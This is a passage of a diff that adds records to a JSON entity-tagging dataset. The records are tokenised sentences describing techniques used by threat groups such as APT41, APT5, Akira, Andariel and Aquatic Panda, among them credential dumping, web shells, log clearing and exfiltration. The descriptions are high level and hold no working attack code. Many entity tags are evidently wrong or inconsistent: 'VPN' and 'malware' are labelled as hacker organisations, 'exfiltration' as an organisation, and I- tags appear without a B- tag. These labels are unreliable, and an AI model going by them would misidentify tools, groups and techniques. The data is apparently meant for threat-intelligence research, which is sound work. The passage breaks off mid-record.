+ "APT41", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz,", + "pwdump,", + "PowerSploit,", + "and", + "Windows", + "Credential", + "Editor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT41", + "executed", + "<code>file", + "/bin/pwd</code>", + "in", + "activity", + "exploiting", + "CVE-2019-19781", + "against", + "Citrix", + "devices." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "compromised", + "credentials", + "to", + "log", + "on", + "to", + "other", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "the", + "Acunetix", + "SQL", + "injection", + "vulnerability", + "scanner", + "in", + "target", + "reconnaissance", + "operations,", + "as", + "well", + "as", + "the", + "JexBoss", + "tool", + "to", + "identify", + "vulnerabilities", + "in", + "Java", + "applications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "HTTP", + "to", + "download", + "payloads", + "for", + "CVE-2019-19781", + "and", + "CVE-2020-10189", + "exploits." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "<code>cmd.exe", + "/c</code>", + "to", + "execute", + "commands", + "on", + "remote", + "machines.", + "APT41", + "used", + "a", + "batch", + "file", + "to", + "install", + "persistence", + "for", + "the", + "Cobalt", + "Strike", + "BEACON", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT41", + "used", + "WMI", + "in", + "several", + "ways,", + "including", + "for", + "execution", + "of", + "commands", + "via", + "WMIEXEC", + "as", + "well", + "as", + "for", + "persistence", + "via", + "PowerSploit." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT41", + "modified", + "legitimate", + "Windows", + "services", + "to", + "install", + "malware", + "backdoors.", + "APT41", + "created", + "the", + "StorSyncSvc", + "service", + "to", + "provide", + "persistence", + "for", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT41", + "leverages", + "various", + "tools", + "and", + "frameworks", + "to", + "brute-force", + "directories", + "on", + "web", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "created", + "their", + "own", + "accounts", + "with", + "Local", + "Administrator", + "privileges", + "to", + "maintain", + "access", + "to", + "systems", + "with", + "short-cycle", + "credential", + "rotation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "JAR/ZIP", + "file", + "format", + "for", + "exfiltrated", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "cleared", + "the", + "command", + "history", + "on", + "targeted", + "ESXi", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT5", + "has", + "accessed", + "Microsoft", + "M365", + "cloud", + "environments", + "using", + "stolen", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "modified", + "legitimate", + "binaries", + "and", + "scripts", + "for", + "Pulse", + "Secure", + "VPNs", + "including", + "the", + "legitimate", + "DSUpgrade.pm", + "file", + "to", + "install", + "the", + "ATRIUM", + "webshell", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "made", + "modifications", + "to", + "the", + "crontab", + "file", + "including", + "in", + "`/var/cron/tabs/`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "legitimate", + "account", + "credentials", + "to", + "move", + "laterally", + "through", + "compromised", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "exploited", + "vulnerabilities", + "in", + "externally", + "facing", + "software", + "and", + "devices", + "including", + "Pulse", + "Secure", + "VPNs", + "and", + "Citrix", + "Application", + "Delivery", + "Controllers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "deleted", + "scripts", + "and", + "web", + "shells", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-OffAct", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "BLOODMINE", + "utility", + "to", + "discover", + "files", + "with", + ".css,", + ".jpg,", + ".png,", + ".gif,", + ".ico,", + ".js,", + "and", + ".jsp", + "extensions", + "in", + "Pulse", + "Secure", + "Connect", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "CLEANPULSE", + "utility", + "to", + "insert", + "command", + "line", + "strings", + "into", + "a", + "targeted", + "process", + "to", + "prevent", + "certain", + "log", + "events", + "from", + "occurring." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "THINBLOOD", + "utility", + "to", + "clear", + "SSL", + "VPN", + "log", + "files", + "located", + "at", + "`/home/runtime/logs`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Features", + "B-Purp", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "malware", + "with", + "keylogging", + "capabilities", + "to", + "monitor", + "the", + "communications", + "of", + "targeted", + "entities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "Task", + "Manager", + "process", + "to", + "target", + "LSASS", + "process", + "memory", + "in", + "order", + "to", + "obtain", + "NTLM", + "password", + "hashes.", + "APT5", + "has", + "also", + "dumped", + "clear", + "text", + "passwords", + "and", + "hashes", + "from", + "memory", + "using", + "Mimikatz", + "hosted", + "through", + "an", + "RDP", + "mapped", + "drive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "created", + "Local", + "Administrator", + "accounts", + "to", + "maintain", + "access", + "to", + "systems", + "with", + "short-cycle", + "credential", + "rotation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "staged", + "data", + "on", + "compromised", + "systems", + "prior", + "to", + "exfiltration", + "often", + "in", + "`C:\\Users\\Public`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "BLOODMINE", + "utility", + "to", + "parse", + "and", + "extract", + "information", + "from", + "Pulse", + "Secure", + "Connect", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "named", + "exfiltration", + "archives", + "to", + "mimic", + "Windows", + "Updates", + "at", + "times", + "using", + "filenames", + "with", + "a", + "`KB<digits>.zip`", + "pattern." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "PowerShell", + "to", + "accomplish", + "tasks", + "within", + "targeted", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "Windows-based", + "utilities", + "to", + "carry", + "out", + "tasks", + "including", + "tasklist.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "CLEANPULSE", + "utility", + "to", + "insert", + "command", + "line", + "strings", + "into", + "a", + "targeted", + "process", + "to", + "alter", + "its", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "moved", + "laterally", + "throughout", + "victim", + "environments", + "using", + "RDP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "SSH", + "for", + "lateral", + "movement", + "in", + "compromised", + "environments", + "including", + "for", + "enabling", + "access", + "to", + "ESXi", + "host", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "copied", + "and", + "exfiltrated", + "the", + "SAM", + "Registry", + "hive", + "from", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "the", + "BLOODMINE", + "utility", + "to", + "collect", + "data", + "on", + "web", + "requests", + "from", + "Pulse", + "Secure", + "Connect", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "modified", + "file", + "timestamps." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "installed", + "multiple", + "web", + "shells", + "on", + "compromised", + "servers", + "including", + "on", + "Pulse", + "Secure", + "VPN", + "appliances." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT5", + "has", + "used", + "cmd.exe", + "for", + "execution", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ajax", + "Security", + "Team", + "has", + "used", + "FireMalv", + "custom-developed", + "malware,", + "which", + "collected", + "passwords", + "from", + "the", + "Firefox", + "browser", + "storage." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ajax", + "Security", + "Team", + "has", + "used", + "Wrapper/Gholee,", + "custom-developed", + "malware,", + "which", + "downloaded", + "additional", + "malware", + "to", + "the", + "infected", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ajax", + "Security", + "Team", + "has", + "used", + "CWoolger", + "and", + "MPK,", + "custom-developed", + "malware,", + "which", + "recorded", + "all", + "keystrokes", + "on", + "an", + "infected", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ajax", + "Security", + "Team", + "has", + "lured", + "victims", + "into", + "executing", + "malicious", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Ajax", + "Security", + "Team", + "has", + "used", + "personalized", + "spearphishing", + "attachments." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Ajax", + "Security", + "Team", + "has", + "used", + "various", + "social", + "media", + "channels", + "to", + "spearphish", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Akira", + "deletes", + "administrator", + "accounts", + "in", + "victim", + "networks", + "prior", + "to", + "encryption." + ], + "ner_tags": [ + "B-HackOrg", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "utilities", + "such", + "as", + "WinRAR", + "to", + "archive", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "encrypts", + "files", + "in", + "victim", + "environments", + "as", + "part", + "of", + "ransomware", + "operations." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "the", + "built-in", + "Nltest", + "utility", + "or", + "tools", + "such", + "as", + "AdFind", + "to", + "enumerate", + "Active", + "Directory", + "trusts", + "in", + "victim", + "environments." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "will", + "exfiltrate", + "victim", + "data", + "using", + "applications", + "such", + "as", + "Rclone." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "compromised", + "VPN", + "accounts", + "for", + "initial", + "access", + "to", + "victim", + "networks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Tool", + "B-Features", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "engages", + "in", + "double-extortion", + "ransomware,", + "exfiltrating", + "files", + "then", + "encrypting", + "them,", + "in", + "order", + "to", + "prompt", + "victims", + "to", + "pay", + "a", + "ransom." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-SamFile", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "legitimate", + "utilities", + "such", + "as", + "AnyDesk", + "and", + "PuTTy", + "for", + "maintaining", + "remote", + "access", + "to", + "victim", + "environments." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "software", + "such", + "as", + "Advanced", + "IP", + "Scanner", + "and", + "MASSCAN", + "to", + "identify", + "remote", + "hosts", + "within", + "victim", + "networks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "has", + "accessed", + "and", + "downloaded", + "information", + "stored", + "in", + "SharePoint", + "instances", + "as", + "part", + "of", + "data", + "gathering", + "and", + "exfiltration", + "activity." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "valid", + "account", + "information", + "to", + "remotely", + "access", + "victim", + "networks,", + "such", + "as", + "VPN", + "credentials." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "collected", + "large", + "numbers", + "of", + "files", + "from", + "compromised", + "network", + "systems", + "for", + "later", + "extraction." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "used", + "watering", + "hole", + "attacks,", + "often", + "with", + "zero-day", + "exploits,", + "to", + "gain", + "initial", + "access", + "to", + "victims", + "within", + "a", + "specific", + "IP", + "range." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "exploited", + "numerous", + "ActiveX", + "vulnerabilities,", + "including", + "zero-days." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "limited", + "its", + "watering", + "hole", + "attacks", + "to", + "specific", + "IP", + "address", + "ranges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "downloaded", + "additional", + "tools", + "and", + "malware", + "onto", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "enabling", + "malicious", + "macros", + "within", + "email", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "used", + "a", + "variety", + "of", + "publicly-available", + "remote", + "access", + "Trojans", + "(RATs)", + "for", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "used", + "<code>tasklist</code>", + "to", + "enumerate", + "processes", + "and", + "find", + "a", + "specific", + "string." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "inserted", + "a", + "malicious", + "script", + "within", + "compromised", + "websites", + "to", + "collect", + "potential", + "victim", + "information", + "such", + "as", + "browser", + "type,", + "system", + "language,", + "Flash", + "Player", + "version,", + "and", + "other", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "conducted", + "spearphishing", + "campaigns", + "that", + "included", + "malicious", + "Word", + "or", + "Excel", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "hidden", + "malicious", + "executables", + "within", + "PNG", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Andariel", + "has", + "used", + "the", + "<code>netstat", + "-naop", + "tcp</code>", + "command", + "to", + "display", + "TCP", + "connections", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "exploited", + "CVE-2012-0158", + "and", + "CVE-2010-3333", + "for", + "execution", + "against", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "run", + "scripts", + "to", + "identify", + "file", + "formats", + "including", + "Microsoft", + "Word." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "spread", + "malware", + "in", + "target", + "networks", + "by", + "copying", + "modules", + "to", + "folders", + "masquerading", + "as", + "removable", + "devices." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "lured", + "victims", + "into", + "opening", + "weaponized", + "documents,", + "fake", + "external", + "drives,", + "and", + "fake", + "antivirus", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "used", + "custom", + "malware,", + "including", + "Mongall", + "and", + "Heyoka", + "Backdoor,", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "used", + "fake", + "icons", + "including", + "antivirus", + "and", + "external", + "drives", + "to", + "disguise", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "used", + "a", + "dropper", + "that", + "employs", + "a", + "worm", + "infection", + "strategy", + "using", + "a", + "removable", + "device", + "to", + "breach", + "a", + "secure", + "network", + "environment." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "has", + "used", + "the", + "Themida", + "packer", + "to", + "obfuscate", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aoqin", + "Dragon", + "obtained", + "the", + "Heyoka", + "open", + "source", + "exfiltration", + "tool", + "and", + "subsequently", + "modified", + "it", + "for", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "used", + "WinRAR", + "to", + "compress", + "memory", + "dumps", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "encoded", + "PowerShell", + "commands", + "in", + "Base64." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "used", + "DLL", + "search-order", + "hijacking", + "to", + "load", + "`exe`,", + "`dll`,", + "and", + "`dat`", + "files", + "into", + "memory." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "attempted", + "to", + "stop", + "endpoint", + "detection", + "and", + "response", + "(EDR)", + "tools", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "deleted", + "malicious", + "executables", + "from", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "downloaded", + "additional", + "malware", + "onto", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-OffAct", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "attempted", + "to", + "harvest", + "credentials", + "through", + "LSASS", + "memory", + "dumping." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "acquired", + "and", + "used", + "njRAT", + "in", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "downloaded", + "additional", + "scripts", + "and", + "executed", + "Base64", + "encoded", + "commands", + "in", + "PowerShell." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "attempted", + "to", + "discover", + "third", + 